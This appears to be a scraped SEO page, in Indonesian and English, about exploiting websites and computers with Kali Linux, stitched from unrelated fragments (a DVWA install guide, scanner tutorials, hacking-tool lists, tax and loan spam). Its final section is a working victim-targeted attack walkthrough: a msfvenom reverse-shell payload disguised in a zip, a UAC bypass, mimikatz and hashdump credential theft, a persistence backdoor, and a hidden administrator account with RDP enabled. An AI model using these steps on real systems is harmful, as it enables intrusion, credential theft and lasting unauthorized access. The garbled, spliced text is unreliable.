cara exploit website di kali linux

Karenamasih barang baru, banyak Wajib Pajak yang merasa ribet dan mengalami banyak kendala, antara lain harus 32 bit. sudah instal 32 bit, namun tiba-tiba auto update jadi 64 bit. Cara Mematikan Auto Update Acrobat. 2Setelah itu kita buka terminal kali linux untuk mengetahui IP kalian dan membuat sebuah App palsu yang akan kita susupkan ke Android target. Caranya buka terminal -> Klik kanak -> Open Terminal. 3.Setelah terminal kali terbuka kita ketik perintah seperti ini : Ifconfig maka akan keluar IP laptop/komputer kalian seperti yang sudah saya tandai. CaraInstal Kali Linux Di VirtualBox Pemula Mudah Dan Cepat Kali Linux merupakan distribusi atau distro yang diciptakan khusus untuk penetraration testing dan keamanan terpopuler di dunia. Jika kalian kenal Backtrack maka tentu tidak asing pula dengan Kali Linux. Dapat dibilang bahwa Kali Linux ini merupakan versi terbaru dari Backtrack. CaraHack Website dengan SQL injection Kali Linux, Hacked! SQL Injection adalah salah satu cara hacking dimana seorang attacker bisa dengan mudah memasukkan perintah SQL lewat URL yang bisa dieksekusi oleh database. Kenapa bisa terjadi? adanya celah ini adalah variable yang kurang di filter, sehingga hacker bisa dengan mudah KlikUnduh Chrome. 4. Terdapat 2 opsi pilihan yang dapat dilakukan untuk melakukan unduhan, Namun pilihlah 64 bit .deb (Untuk Debian/Ubuntu). Lalu klik Setuju dan Pasang. 5. Masuk ke terminal untuk membuat perintah penginstallan Google Chrome, Ketikkan perintah su untuk masuk ke User Root. Namun jika kamu belum bisa mengakses User Root kamu vay tiền nhanh chỉ cần cmnd 18 tuổi. Pre-requisites to install DVWAStep 1 Download Damn Vulnerable Web Application DVWAStep 2 Configure DVWAStep 3 Install MySQL on Kali LinuxStep 4 Configure MySQL DatabaseStep 5 Install PHPStep 6 Configure Apache ServerStep 7 Access DVWA on Your BrowserConclusion In this tutorial, I will give you a step-by-step guide on how to set up and install DVWA on your Kali Linux system. When starting as a penetration tester, you will need a pentesting-lab to test out your penetration skills. One such system is the Damn Vulnerable Web Application DVWA. DVWA is a vulnerable web application developed using PHP and MySQL that allows ethical hackers to test out their hacking skills and security tools. It’s also an excellent guide for professional web developers with security in mind. They can use it to learn which features of a web application are easy to exploit. Some of the most common web vulnerabilities demonstrated by this application include Cross-Site Request Forgery CSRF, File Inclusion, SQL injection, Bruteforce attacks, and much more. Pre-requisites to install DVWA This tutorial assumes that you already have a Kali Linux Server Up and Running. Step 1 Download Damn Vulnerable Web Application DVWA To get started, we will need to clone the DVWA GitHub into our /var/www/html directory. That is the location where Localhost files are stored in Linux systems. Launch the Terminal and change our directory to the /var/www/html directory with the command below. $ cd /var/www/html Sample Output Once in this directory, we will clone the DVWA GitHub repository with the command below. $ sudo git clone Sample Output After cloning, we can rename the DVWA folder to dvwa. That is not mandatory, but it makes work easier when executing multiple commands. $ sudo mv DVWA dvwa ALSO READ Wordlist Generator using Crunch [6 Methods]Step 2 Configure DVWA After downloading cloning DVWA in our /var/www/html directory, we still need to do some minor configurations. To get started, let’s set read, write, and execute permissions to the DVWA directory. Execute the command below. $ chmod -R 777 dvwa/ Sample Output After successfully executing the command, we need to set up the user and password required to access the database. Change directory to point to the config directory with the command below. $ cd dvwa/config When you run the ls command to view the files inside the directory, you will see the file. That is the original file containing the default configurations. We won’t edit it. Instead, we will create a copy of this file called and the original file will act as our backup in case things go wrong. Execute the command below. sudo cp Sample Output Run the command below to open the newly created file with nano editor and make the necessary changes, as shown in the image below. We will set db_user as user and db_password as pass. Feel free to use a different username or password. $ sudo nano Sample Output Save the file Ctrl + O, then Enter and Exit Ctrl + X. That’s it! We are done configuring the DVWA Web application. Let’s move on and configure the database MySQL. ALSO READ MobSF Android App Pentesting [Step-by-Step] Step 3 Install MySQL on Kali Linux By default, MySQL comes pre-installed on Kali Linux. If that's not the case for you or maybe you messed up with MySQL, we can go ahead and install it manually. If you have worked with Debian-based distributions, MySQL comes in two packages mysql-server mysql-client In our case, we will need to install the mysql-server. However, there is a catch. If you try using the command apt install mysql-server you will most likely get the error "Package mysql-server is not available, but is referred to by another package. E Package 'mysql-server' has no installation candidate." That's because the package mysql-server is referred to default-mysql-server in Kali Linux and also in the latest release of Debian Debian 10. Therefore, use the command below sudo apt install default-mysql-server Sample output Step 4 Configure MySQL Database Start the Mysql service with the command below $ sudo service mysql start You can check whether the service is running using the systemctl status command below. $ systemctl status mysql Sample Output Login to the MySQL database using the command below as root. If you have another name set for the superuser in your system, use it instead of root. $ sudo mysql -u root -p You will see a prompt to enter the password. Just hit Enter since we haven’t set any password. MySQL will open, as shown in the image below ALSO READ Install Kali Linux on VirtualBox [step-by-step screenshots]We will create a new user with the username and password set in our DVWA application configuration file. In my case, the username was user,' and the password was pass.’ The server we are using is Localhost Use the command below. create user 'user'' identified by 'pass'; Sample Output We need to grant this new user privilege over the dvwa database. Execute the command below. grant all privileges on dvwa.* to 'user'' identified by 'pass'; Up to this point, we are through with configuring both the DVWA application and the MySQL database. Type exit to close the database. Step 5 Install PHP PHP comes installed in Kali Linux. However, if you want to install a particular version, you can do it manually from the Terminal. In this post, we will install PHP which is the latest release as of writing this post. Follow the steps below. First, update your system and add the SURY PHP PPA repository by executing the commands below. sudo apt update sudo apt -y install lsb-release apt-transport-https ca-certificates sudo wget -O /etc/apt/ echo "deb buster main" sudo tee /etc/apt/ Sample output After successfully adding the repository, use the command below to install PHP sudo apt update sudo apt install -y Sample output To install additional PHP extensions, use the syntax below where xxx stands for the extension name. sudo apt install sudo apt install Sample output ALSO READ Setup Virtual Penetration Testing Lab [Step-by-Step]Step 6 Configure Apache Server Now, we need to configure the server. Use the command below to change your location on the Terminal to point to /etc/php/ directory. $ cd /etc/php/ NOTE As of writing this post, I was running PHP version You might need to confirm your version and replace it on the command. Use the command below to check the installed version. $ ls /etc/php In the /etc/php/ when you execute the ls command, you will see a file called That is the file we will edit to configure our localhost server. Use the command below to open it using the nano editor. $ sudo nano Scroll down and look for these two lines allow_url_fopen and allow_url_include. Set them both as On. Save the file Ctrl + O, then Enter and Exit Ctrl + X. Start Apache server using the command below $ sudo service apache2 start To check whether the service started successfully, use the status command. $ systemctl status apache2 Sample Output Step 7 Access DVWA on Your Browser That’s it! We now have everything configured, and we can proceed to launch DVWA. Open your browser and enter the URL That will open the web page as shown in the image ALSO READ How to disable ICMP and ICMPv6 redirects in Linux You might see the errors colored in red as in the image above. Don’t panic! Scroll down and click the Create / Reset Database button. That will create and configure the database. After some time, you will be redirected to the DVWA login page. Log in with these credentials Username - admin Password - password Once logged in, you will see the DVWA main page. On the left panel, we have the different types of attacks you can exploit and the DVWA Security button that allows you to choose the desired security level - Low, Medium, High, or Impossible. Conclusion That is how we install DVWA on Kali Linux. Pretty easy, right? DVWA is an excellent resource for both beginners getting started with Penetration Testing and experts. All you need to do is change the security levels depending on your skills. Feel free to share the vulnerability you found interesting to exploit with our readers in the comments section. In this chapter, we will learn about website penetration testing offered by Kali Linux. Vega Usage Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting XSS, inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows. Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. Vega can be extended using a powerful API in the language of the web JavaScript. The official webpage is Step 1 − To open Vega go to Applications → 03-Web Application Analysis → Vega Step 2 − If you don’t see an application in the path, type the following command. Step 3 − To start a scan, click “+” sign. Step 4 − Enter the webpage URL that will be scanned. In this case, it is metasploitable machine → click “ Next”. Step 5 − Check all the boxes of the modules you want to be controlled. Then, click “Next”. Step 6 − Click “Next” again in the following screenshot. Step 7 − Click “Finish”. Step 8 − If the following table pops up, click “Yes”. The scan will continue as shown in the following screenshot. Step 9 − After the scan is completed, on the left down panel you can see all the findings, that are categorized according to the severity. If you click it, you will see all the details of the vulnerabilities on the right panel such as “Request”, ”Discussion”, ”Impact”, and ”Remediation”. ZapProxy ZAP-OWASP Zed Attack Proxy is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. It is a Java interface. Step 1 − To open ZapProxy, go to Applications → 03-Web Application Analysis → owaspzap. Step 2 − Click “Accept”. ZAP will start to load. Step 3 − Choose one of the Options from as shown in the following screenshot and click “Start”. Following web is metasploitable with IP Step 4 − Enter URL of the testing web at “URL to attack” → click “Attack”. After the scan is completed, on the top left panel you will see all the crawled sites. In the left panel “Alerts”, you will see all the findings along with the description. Step 5 − Click “Spider” and you will see all the links scanned. Database Tools Usage sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Let’s learn how to use sqlmap. Step 1 − To open sqlmap, go to Applications → 04-Database Assessment → sqlmap. The webpage having vulnerable parameters to SQL Injection is metasploitable. Step 2 − To start the sql injection testing, type “sqlmap – u URL of victim” Step 3 − From the results, you will see that some variable are vulnerable. sqlninja sqlninja is a SQL Injection on Microsoft SQL Server to a full GUI access. sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Full information regarding this tool can be found on Step 1 − To open sqlninja go to Applications → 04-Database Assesment → sqlninja. CMS Scanning Tools WPScan WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues. Step 1 − To open WPscan go to Applications → 03-Web Application Analysis → “wpscan”. The following screenshot pops up. Step 2 − To scan a website for vulnerabilities, type “wpscan –u URL of webpage”. If the scanner is not updated, it will ask you to update. I will recommend to do it. Once the scan starts, you will see the findings. In the following screenshot, vulnerabilities are indicated by a red arrow. Joomscan Joomla is probably the most widely-used CMS out there due to its flexibility. For this CMS, it is a Joomla scanner. It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla sites. Step 1 − To open it, just click the left panel at the terminal, then “joomscan – parameter”. Step 2 − To get help for the usage type “joomscan /?” Step 3 − To start the scan, type “ joomscan –u URL of the victim”. Results will be displayed as shown in the following screenshot. SSL Scanning Tools TLSSLed is a Linux shell script used to evaluate the security of a target SSL/TLS HTTPS web server implementation. It is based on sslscan, a thorough SSL/TLS scanner that is based on the openssl library, and on the “openssl s_client” command line tool. The current tests include checking if the target supports the SSLv2 protocol, the NULL cipher, weak ciphers based on their key length 40 or 56 bits, the availability of strong ciphers like AES, if the digital certificate is MD5 signed, and the current SSL/TLS renegotiation capabilities. To start testing, open a terminal and type “tlssled URL port“. It will start to test the certificate to find data. You can see from the finding that the certificate is valid until 2018 as shown in green in the following screenshot. w3af w3af is a Web Application Attack and Audit Framework which aims to identify and exploit all web application vulnerabilities. This package provides a Graphical User Interface GUI for the framework. If you want a command-line application only, install w3af-console. The framework has been called the “metasploit for the web”, but it’s actually much more as it also discovers the web application vulnerabilities using black-box scanning techniques. The w3af core and its plugins are fully written in Python. The project has more than 130 plugins, which identify and exploit SQL injection, cross-site scripting XSS, remote file inclusion and more. Step 1 − To open it, go to Applications → 03-Web Application Analysis → Click w3af. Step 2 − On the “Target” enter the URL of victim which in this case will be metasploitable web address. Step 3 − Select the profile → Click “Start”. Step 4 − Go to “Results” and you can see the finding with the details. It is surprising how many people are interested in learning how to hack. Could it be because they usually have a Hollywood-based impression in their minds? Anyway, thanks to the open-source community we can list out a number of hacking tools to suit every one of your needs. Just remember to keep it ethical! 1. Aircrack-ng Aircrack-ng is one of the best wireless password hack tools for WEP/WAP/WPA2 cracking utilized worldwide! It works by taking packets of the network, analyses it via passwords recovered. It also possesses a console interface. In addition to this, Aircrack-ng also makes use of standard FMS Fluhrer, Mantin, and Shamir attack along with a few optimizations such as the KoreK attacks and PTW attack to quicken the attack which is faster than the WEP. If you find Aircrack-ng hard to use, simply check for tutorials available online. Aircrack-ng Wifi Network Security 2. THC Hydra THC Hydra uses brute force attack to crack virtually any remote authentication service. It supports rapid dictionary attacks for 50+ protocols including ftp, https, telnet, etc. You can use it to crack into web scanners, wireless networks, packet crafters, gmail, etc. Hydra – Login Cracker 3. John the Ripper John the Ripper is another popular cracking tool used in the penetration testing and hacking community. It was initially developed for Unix systems but has grown to be available on over 10 OS distros. It features a customizable cracker, automatic password hash detection, brute force attack, and dictionary attack among other cracking modes. John The Ripper Password Cracker 4. Metasploit Framework Metasploit Framework is an open source framework with which security experts and teams verify vulnerabilities as well as run security assessments in order to better security awareness. It features a plethora of tools with which you can create security environments for vulnerability testing and it works as a penetration testing system. Metasploit Framework Penetration Testing Tool 5. Netcat Netcat, usually abbreviated to nc, is a network utility with which you can use TCP/IP protocols to read and write data across network connections. You can use it to create any kind of connection as well as to explore and debug networks using tunneling mode, port-scanning, etc. Netcat Network Analysis Tool 6. Nmap “Network Mapper” Network Mapper is a free and open-source utility tool used by system administrators to discover networks and audit their security. It is swift in operation, well documented, features a GUI, supports data transfer, network inventory, etc. Nmap Network Discovery and Security Auditing Tool 7. Nessus Nessus is a remote scanning tool that you can use to check computers for security vulnerabilities. It does not actively block any vulnerabilities that your computers have but it will be able to sniff them out by quickly running 1200+ vulnerability checks and throwing alerts when any security patches need to be made. Nessus Vulnerability Scanner 8. WireShark WireShark is an open-source packet analyzer that you can use free of charge. With it you can see the activities on a network from a microscopic level coupled with pcap file access, customizable reports, advanced triggers, alerts, etc. It is reportedly the world’s most widely-used network protocol analyzer for Linux. Wireshark Network Analyzer 9. Snort Snort is a free and open-source NIDS with which you can detect security vulnerabilities in your computer. With it you can run traffic analysis, content searching/matching, packet logging on IP networks, and detect a variety of network attacks, among other features, all in real-time. Snort Network Intrusion Prevention Tool 10. Kismet Wireless Kismet Wireless is a intrusion detection system, network detector, and password sniffer. It works predominantly with Wi-Fi IEEE networks and can have its functionality extended using plugins. Kismet Wireless Network Detector 11. Nikto Nikto2 is a free and open-source web scanner for performing quick comprehensive tests against items on the web. It does this by looking out for over 6500 potentially dangerous files, outdated program versions, vulnerable server configurations, and server-specif problems. Nikto Web Server Scanner 12. Yersinia Yersinia, named after the yersinia bacteria, is a network utility too designed to exploit vulnerable network protocols by pretending to be a secure network system analyzing and testing framework. It features attacks for IEEE Hot Standby Router Protocol HSRP, Cisco Discovery Protocol CDP, etc. Yersinia Network Analyzing Tool 13. Burp Suite Scanner Burp Suite Scanner is a professional integrated GUI platform for testing the security vulnerabilities of web applications. It bundles all of its testing and penetration tools into a Community free edition, and professional $349 /user /year edition. Burp Security Vulnerability Scanner 14. Hashcat Hashcat is known in the security experts’ community among the world’s fastest and most advanced password cracker and recovery utility tool. It is open-source and features an in-kernel rule engine, 200+ Hash-types, a built-in benchmarking system, etc. Hashcat Password Recovery Tool 15. Maltego Maltego is propriety software but is widely used for open-source forensics and intelligence. It is a GUI link analysis utility tool that provides real-time data mining along with illustrated information sets using node-based graphs and multiple order connections. Maltego Intelligence and Forensics Tool 16. BeEF The Browser Exploitation Framework BeEF, as the name implies, is a penetration tool that focuses on browser vulnerabilities. With it you can asses the security strength of a target environment using client-side attack vectors. BeEF Browser Exploitation Framework 17. Fern Wifi Cracker Fern Wifi Cracker is a Python-based GUI wireless security tool for auditing network vulnerabilities. With it, you can crack and recover WEP/WPA/WPS keys as well as several network-based attacks on Ethernet-based networks. Fern Wifi Cracker 18. GNU MAC Changer GNU MAC Changer is a network utility that facilitates an easier and quicker manipulation of network interfaces’ MAC addresses. Gnu Mac Changer 19. Wifite2 Wifite2 is a free and open-source Python-based wireless network auditing utility tool designed to work perfectly with pen-testing distros. It is a complete rewrite of Wifite and thus, features an improved performance. It does a good job at decloaking and cracking hidden access points, cracking weak WEP passwords using a list of cracking techniques, etc. Wifite Wireless Network Auditing Tool 20 .Pixiewps Pixiewps is a C-based brute-force offline utility tool for exploiting software implementations with little to no entropy. It was developed by Dominique Bongard in 2004 to use the “pixie-dust attack” with the intention to educate students. Depending on the strength of the passwords you’re trying to crack, Pixiewps can get the job done in a mater of seconds or minutes. PixieWPS Brute Force Offline Tool Well, ladies and gentlemen, we’ve come to the end of our long list of Penetration testing and Hacking tools for Kali Linux. All the listed apps are modern and are still being used today. If we missed any titles don’t hesitate to let us know in the comments section below. - Kali Linux adalah salah satu "senjata" yang sering digunakan oleh para ahli IT maupun hacker profesional. Kali Linux memiliki lebih dari 300 tools untuk memudahkan penggunannya menguji keamanan maupun meretas jaringan untuk tujuan yang beragam. Dari review yang ada di forum-forum, kita bisa melihat bahwa Kali Linux sangat diandalkan. Fungsi masing-masing tools tersebut juga berbeda, tapi pada intinya kalau semuanya digabungkan akan menjadi satu kesatuan yang powerful. Perlu diketahui, tidak semua tools hacking di Kali Linux pada daftar berikut bisa digunakan secara gratis, ada tools berbayar yang bisa kamu coba dengan fitur lebih lengkap. Nah, buat kamu yang sedang mencari tools hacking website di Kali Linux, daftar-daftar berikut mungkin bisa jadi referensi. 1. Lynis Bicara soal tools Kali Linux terbaik, kamu mungkin perlu mencoba Lynis. Tools ini berfungsi untuk mengaudit, menguji, dan hardening keamanan sistem. Bukan hanya itu saja, software yang dikembangkan CISOfy ini juga bisa diandalkan untuk mendeteksi Juga Tool Pentesting Linux di Windows dengan Pentestbox Pada dasarnya, cara kerja Lynis adalah memindai dan mengumpulkan informasi terkait apa saja yang harus ditingkatkan pada sistem keamanan. Sehingga pengguna bisa mencegah serangan deface pada website yang sangat Lynis2. Autopsy Forensic Browser Autopsy merupakan tools yang bisa kamu gunakan untuk mengaudit dan mencari tahu apa yang terjadi pada komputer. Selain itu, tools open source ini juga bisa memulihkan gambar yang terhapus dari kartu memori. Tak heran tools ini digunakan oleh kepolisian dan perusahaan IT. Meskipun termasuk tools Kali Linux gratis, namun Autopsy dibekali fitur-fitur unggulan. Seperti menganalisa timeline, hash filtering, mencari kata kunci, dan masih banyak lagi. Autopsy cocok untuk pemula karena mudah digunakan dan menyediakan panduan cara pengoperasian yang sangat Autopsy3. Wireshark Sama seperti Autopsy, Wireshark termasuk tools hacking website di Kali Linux yang cukup populer. Tools yang sebelumnya bernama Ethereal ini memiliki fungsi untuk menganalisa dan mengatasi gangguan pada jaringan. Wireshark juga termasuk tools open source yang legal dan aman digunakan. Namun penggunaannya tetap harus mematuhi hukum yang berlaku. Gunakan untuk sesuatu yang positif, seperti memantau jaringan dan meningkatkan keamanan pada website atau Wireshark4. THC-Hydra Di film Captain America Hydra merupakan organisasi yang sangat berbahaya. Kalau di dunia IT, Hydra termasuk tools hacking website di Kali Linux yang sangat powerful. Tools ini biasa digunakan untuk mencari tahu password pada suatu jaringan. Kelebihan Hydra dibanding tools lain adalah akses jaringan yang sangat cepat, bisa membaca dan menampilkan password yang memenuhi syarat. Dengan menggunakan tools ini, kamu bisa mengakses secara diam-diam ke suatu jaringan dari jarak jauh. Hydra mendukung semua protokol jaringan mulai dari Cisco AAA, Cisco auth, Cisco enable, CVS hingga Hydra5. Nmap Network Mapper Nmap adalah salah satu tools hacking di Kali Linux yang cukup populer. Kamu bisa mengandalkannya untuk mencari informasi alamat IP maupun mengetahui tingkat keamanan pada suatu jaringan. Nmap masuk dalam kategori open source yang bisa digunakan dengan bebas. Alasan kenapa Nmap populer adalah karena tools ini sudah menerima banyak penghargaan dan juga sering muncul di film-film hacker seperti Die Hard 4 hingga Matrix. Selain itu Nmap juga dibekali interface sederhana yang mudah digunakan untuk Nmap6. Metasploit Framework Kalau kamu bertanya apa saja yang bisa di-hack dengan Kali Linux, jawabannya sudah pasti semua hal yang terhubung pada jaringan. Nah, dalam prosesnya, kamu bisa mengandalkan Metasploit Framework sebagai rangkaian tools hacking di Kali Linux. Dengan tools ini kamu bisa memverifikasi sekaligus menguji serentan apa keamanan pada jaringan. Metasploit Framework juga masuk jajaran tools open source. Namun kalau ingin fitur yang lebih lengkap, tools ini juga tersedia dalam versi Metasploit7. Burp Suite Scanner Burp Suite merupakan tools yang tepat jika kamu baru belajar Kali Linux. Berbeda dari tools lainnya, Burp Suite dibekali tampilan ringan yang memudahkan pengguna dalam mempelajari seperti apa sistem keamanan yang mudah disusupi Juga Cara Instal Burp suite di Windows Seperti namanya, Burp Suite berfungsi sebagai scanner untuk memindai keamanan pada aplikasi web. Tools ini juga cukup populer karena dilengkapi fitur-fitur Burp Suite Scanner8. Maltego Maltego juga masuk jajaran tools untuk hacking website di Kali Linux. Kemampuan tools ini sangat powerful untuk mencari data dan menganalisa informasi guna mengetahui celah keamanan. Sama seperti Autopsy, Maltego juga jadi andalan pihak kepolisian untuk melacak kejahatan cyber. Maltego bukan open source, untuk bisa menggunakannya kamu harus membayar $999 per tahun. Namun kamu tetap bisa menggunakannya secara gratis dengan cara membuat akun di situs resmi Maltego. Selain Linux, software ini juga tersedia di Mac OS dan Maltego9. Skipfish Kalau kamu menginginkan tools mirip WPScan yang tidak fokus pada Wordpress saja, maka Skipfish bisa jadi pilihan. Tools ini sangat mudah digunakan dengan fungsi sebagai pemindai aplikasi web dengan metode crawling yang sangat baik. Skipfish bisa dibilang tools Kali Linux terbaik dengan didukung kecepatan yang tinggi, mudah digunakan, tidak membebani CPU, serta fitur lainnya yang mendukung segala aktivitas hacking. Tools yang dikembangkan oleh Google ini bisa kamu unduh Skipfish10. John The Ripper John The Ripper pantas dinobatkan sebagai tools Kali Linux terbaik, pasalnya alat peretasan yang sering digunakan di film-film hacker ini berfungsi sebagai password cracking. Bahkan, software ini bisa mencari tahu password pada file zip yang terkunci. John The Ripper termasuk software open source, sehingga kamu tak perlu mengeluarkan uang untuk bisa menggunakannya. Namun kalau menginginkan untuk kebutuhan komersil, ada juga versi pro dengan fitur yang lebih John The Ripper11. Nikto Nikto juga berfungsi sebagai scanner server web dengan performa yang bagus. Dengan dukungan fitur powerful, tools ini bisa kamu andalkan untuk memeriksa program file yang berbahaya. Selain itu kamu juga mengetahui server mana yang telah kadaluarsa. Tools ini bisa kamu gunakan untuk menguji sistem IDS, karena didukung dengan metode anti-IDS LibWhisker. Berbeda dari Burp Suite, Nikto adalah tools hacking Kali Linux open source yang bisa digunakan secara Nikto12. Nessus Nessus melengkapi daftar tools hacking website di Kali Linux pada artikel ini. Tools ini bisa kamu andalkan untuk menemukan celah jaringan yang berpotensi disusupi hacker. Bukan hanya di 1 komputer saja, kamu juga bisa masuk ke komputer lain yang terhubung di satu jaringan. Nessus bukan hanya bisa mendeteksi port yang terbuka saja, tetapi juga memeriksa patch sistem operasi seperti Linux, Windows, MacOS, dan Unix. Alasan kenapa tools ini aman digunakan adalah karena database keamanan selalui diperbarui setiap hari. Saat menjalankan Nessus, kamu akan dihadapkan dengan tiga tahap, mulai dari scanning, enumeration, dan yang terakhir mendeteksi Nessus Microsoft Certification Questions adalah pertanyaan-pertanyaan yang diajukan dalam ujian sertifikasi Microsoft. Sertifikasi Microsoft adalah program pengakuan resmi dari Microsoft yang memungkinkan individu untuk membuktikan bahwa mereka memiliki keahlian dalam teknologi dan produk Microsoft tertentu. Ujian sertifikasi Microsoft mencakup pertanyaan-pertanyaan tentang topik-topik seperti administrasi jaringan, pengembangan aplikasi, desain web, dan teknologi Microsoft lainnya. Pertanyaan-pertanyaan ini dirancang untuk menguji pengetahuan, keterampilan, dan kemampuan individu dalam menggunakan teknologi dan produk daftar-daftar terbaik sebagai referensi tools untuk hacking website di Kali Linux yang bisa kamu coba. Seperti yang sudah disampaikan sebelumnya, tools di atas aman dan legal jika digunakan dengan bijak. Akhir kata, semoga bermanfaat, ya! Overview Teknik eksploitasi mungkin dapat dikatakan teknik tertinggi dalam dunia hacking & security. Dengan menggunakan teknik ini, seorang attacker dapat menguasai seluruh sumber daya pada komputer korban. Attacker dapat menjelajahi seluruh isi di dalam komputer korban, seperti membuat file, menghapus file, memasang backdoor, mengambil screenshot pada webcam & layar dan masih banyak lagi. Pada tutorial ini, akan dijelaskan teknik dasar yang dapat dijadikan sebuah gambaran dari eksploitasi . Agar lebih mudah pembaca dapat melakukan praktik menggunakan OS Kali Linux. Dapat juga menggunakan OS Linux lainnya yang penting untuk tools-tools yang dibutuhkan tersedia Langkah Eksploitasi Attacker 1 Membuat payload untuk dieksekusi oleh korban. File ini yang akan membuka akses di komputer korban. $ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST= LPORT=4444 -o /root/Desktop/ 2. Membungkus payload menggunakan zip. Sehingga nanti jika file ini di-donwload oleh korban melalui web browser misalkan Google Chrome, maka setidaknya file ini tidak dianggap file mencurigakan. $ cd /root/Desktop/ $ zip -r 3. Masuk ke msfconsole dan membuka sesi eksploitasi. $ msfconsole $ set payload $ use multi/handler $ set payload windows/meterpreter/reverse_tcp $ set LHOST $ set LPORT 4444 $ run 4. Jalankan web server apacher2 pada Kali Linux. Hal ini bertujuan agar korban dapat melakukan download file yang telah di-generate sebelumnya. Dan copy file tersebut ke path web server. $ service apache2 start $ copy /var/www/html/files/ 5. Akses web server dan lalukan download file dari komputer korban. 6. Eksekusi file tersebut. Jangan lupa untuk mematikan semua antivirus yang berjalan pada komputer korban. 7. Setelah dieksekusi, lihat pada sesi msfconsole sebelumnya pada poin ke-3. Maka sesi eksploitasi akan terbuka. Sekarang attacker memiliki akses ke komputer korban. 8. Lakukan perintah-perintah berikut untuk melakukan verifikasi pada komputer korban. $ getuid $ load mamikatz $ getsystem 9. Pada perintah getsystem biasanya masih terdapat error. Akses masih ditolak dalam artian attacker belum sepenuhnya mengguasai komputer korban. 10. Jalankan perintah berikut agar sesi ekploitasi sebelumnya masuk ke dalam background. $ background 11. Gunakan exploit/windows/local/bypassuac_comhijack untuk melakukan bypass pada UAC di komputer korban. $ use exploit/windows/local/bypassuac_comhijack 12. Buka sesi kedua dan lakukan eksploitasi lagi. $ set SESSION 2 $ set payload windows/meterpreter/reverse_tcp $ set LHOST $ set LPORT 4444 $ run 13. Maka attacker langsung dapat masuk ke komputer korban. Lakukan perintah-perintah berikut untuk mendapatkan informasi-informasi pada komputer korban. $ sysinfo $ getuid $ getsystem $ load mamikatz $ hashdump 14. Jika ingin melakukan akses shell / command prompt pada komputer korban, lakukan perintah $ execute -f -i -H Membuat Backdoor Hal ini berfungsi agar ketika attacker ingin melakukan akses lagi di lain waktu, attacker dapat langsung masuk ke dalam sistem korban tanpa ada campur tangan dari korban. 1 Jalankan perintah di bawah ini. $ run persistence -U -i 5 -p 4444 -r 2. Reboot komputer korban. Kemudian keluar dari sesi yang kedua tadi. $ reboot $ exit 3. Setelah komputer korban menyala lagi, buka sesi baru untuk melakukan tes apakah attacker dapat langsung mengakses komputer korban. $ use exploit/multi/handler $ set payload windows/meterpreter/reverse_tcp $ set LHOST $ set LPORT 4444 $ exploit $ sysinfo Seharusnya korban tidak perlu melakukan eksekusi pada agar attacker bisa masuk ke sistem korban. 4. Membuat user di komputer korban agar dapat di-remote melalaui Remote Desktop Protocol. $ execute -f -i -H $ net users $ net user zakky $ net user /add zakky2 passxxx $ net localgroup administrators zakky2 /add $ net localgroup "Remote Desktop Users" zakky /add $ net user zakky2 //enable RDP $ reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f //disable RDP $ reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 1 /f 5. Coba lakukan remote ke komputer korban menggunakan aplikasi Remmina di Linux. Tantangan terbesar menurut penulis pada teknik eksploitasi adalah bagaimana agar payload yang kita buat untuk dieksekusi oleh korban tidak terdeteksi oleh antivirus. Sehingga proses eksploitasi dapat berjalan mulus tanpa ada kecurigaan dari korban. Semoga tulisan ini bermanfaat. Jika ada pertanyaan silahkan berikan komentar di bawah.

cara exploit website di kali linux